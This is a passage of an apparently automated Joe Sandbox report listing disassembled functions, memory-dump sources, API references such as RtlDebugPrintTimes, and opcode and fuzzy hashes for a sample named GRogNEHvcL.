                                            • Instruction ID: 2ffe568fdb33b0ce131ba17139fce7d86c6142566762c8220c04c9538f176c0d
                                            • Opcode Fuzzy Hash: d84d73e5c23e50fb3757e9c39722a22be4762bc4311d32b0c95698253cae6a4f
                                            • Instruction Fuzzy Hash: 9291D171E002169BEB25CFADCD88ABEBBB5EF44320F58452AE955E72C0D7348B41CB50
                                            Function 01A4D02D Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 240timeCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2398166296.0000000001A26000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                            • Associated: 0000000E.00000002.2398166296.0000000001A00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001A07000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001A80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001A86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001AC2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001B23000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001B29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_1a00000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: Bl$l
                                            • API String ID: 3446177414-208461968
                                            • Opcode ID: eb7f1aa7ee83350608e4ddbd25038549ecd7e25c2bec851641894d113c0834a4
                                            • Instruction ID: d266324bdfd55ca27f02f0eadd850c523b34f31115b9960b8703ed590aefd45e
                                            • Opcode Fuzzy Hash: eb7f1aa7ee83350608e4ddbd25038549ecd7e25c2bec851641894d113c0834a4
                                            • Instruction Fuzzy Hash: 76A1C631A00329CBEF31DF99C990BAEB7B5BBA5714F0440E9D90967241CB74AE85CF51
                                            Function 01A75DA4 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 180COMMON
                                            Download Yara Rule
                                            APIs
                                            • __startOneArgErrorHandling.LIBCMT ref: 01A75E34
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2398166296.0000000001A26000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                            • Associated: 0000000E.00000002.2398166296.0000000001A00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001A07000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001A80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001A86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001AC2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001B23000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001B29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_1a00000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID: ErrorHandling__start
                                            • String ID: pow
                                            • API String ID: 3213639722-2276729525
                                            • Opcode ID: 3ac96f5ace3c5b4a542b2d258b85be229da83ad7fea71956d895c62e09469a38
                                            • Instruction ID: 2bec828e46d7d52a3b7f5e1cd46db35a5b4419fed11e0778b939aeb08c8ed489
                                            • Opcode Fuzzy Hash: 3ac96f5ace3c5b4a542b2d258b85be229da83ad7fea71956d895c62e09469a38
                                            • Instruction Fuzzy Hash: 52514BF1E0820696DB22B71CDE1536E7BA4EB40710F14CD58E0D586299EB388BD68B56
                                            Function 01A64C59 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2398166296.0000000001A26000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                            • Associated: 0000000E.00000002.2398166296.0000000001A00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001A07000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001A80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001A86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001AC2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001B23000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001B29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_1a00000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 0$Flst
                                            • API String ID: 0-758220159
                                            • Opcode ID: ce5d105dad00013c0a4d3143cc9e2a0e0bc813c0a77af73eb2539825eb71a765
                                            • Instruction ID: 0b2bf5442e0308c33a8b2cf7b281f710ae9c5b7e8a26c019fca27e0e3fa1db82
                                            • Opcode Fuzzy Hash: ce5d105dad00013c0a4d3143cc9e2a0e0bc813c0a77af73eb2539825eb71a765
                                            • Instruction Fuzzy Hash: 5651ABB1E00219CFCF26DFA9C58466DFBF8FF58714F54802AD1499B255EB709989CB80
                                            Function 01A5D7B0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 151timeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RtlDebugPrintTimes.NTDLL ref: 01A5D959
                                              • Part of subcall function 01A34859: RtlDebugPrintTimes.NTDLL ref: 01A348F7
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2398166296.0000000001A26000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                            • Associated: 0000000E.00000002.2398166296.0000000001A00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001A07000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001A80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001A86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001AC2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001B23000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001B29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_1a00000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: $$$
                                            • API String ID: 3446177414-233714265
                                            • Opcode ID: af2d493e6829412fb7dfec3e22979901f3a76ad73cfb3dea98b2d93a45240451
                                            • Instruction ID: 5d65baac50e4c363781b09215e8003c77f0aa41470d1b8121b4990795208a0f3
                                            • Opcode Fuzzy Hash: af2d493e6829412fb7dfec3e22979901f3a76ad73cfb3dea98b2d93a45240451
                                            • Instruction Fuzzy Hash: 3E510071A08346DFDB76DFE8C5847DDBBB1BF48318F284159D809AB295C770A889CB80
                                            Function 01AAFD82 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109timeCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2398166296.0000000001A86000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                            • Associated: 0000000E.00000002.2398166296.0000000001A00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001A07000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001A26000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001A80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001AC2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001B23000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001B29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_1a00000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: $
                                            • API String ID: 3446177414-3993045852
                                            • Opcode ID: 0cebd74b53a152e2729685dc1c28d7e7d152f71fb6e2b9fa04bf11378f3ec159
                                            • Instruction ID: c85ee2ec80d6211af94d3419648bd635db1f0c21d9afcef85424536581642732
                                            • Opcode Fuzzy Hash: 0cebd74b53a152e2729685dc1c28d7e7d152f71fb6e2b9fa04bf11378f3ec159
                                            • Instruction Fuzzy Hash: 114168B5A00209AFDF26DF99C980AEEBBB5FF48B14F540129EA04A7341D7719D15CBA0
                                            Function 01A2DF81 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109timeCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2398166296.0000000001A26000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                            • Associated: 0000000E.00000002.2398166296.0000000001A00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001A07000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001A80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001A86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001AC2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001B23000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001B29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_1a00000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: 0$0
                                            • API String ID: 3446177414-203156872
                                            • Opcode ID: cfd9bf0717d1009ee245f688f192ad9387b00b7564ecc5e527935a320531e75b
                                            • Instruction ID: 8c41ac7f09d893a86771ddd7c6b806140bf4c8fd7bbe43640fa281ab5c1c9415
                                            • Opcode Fuzzy Hash: cfd9bf0717d1009ee245f688f192ad9387b00b7564ecc5e527935a320531e75b
                                            • Instruction Fuzzy Hash: E2417CB16087569FD310CF2CC584A16BBE4BB88314F04492EF988DB342D775EA06CB96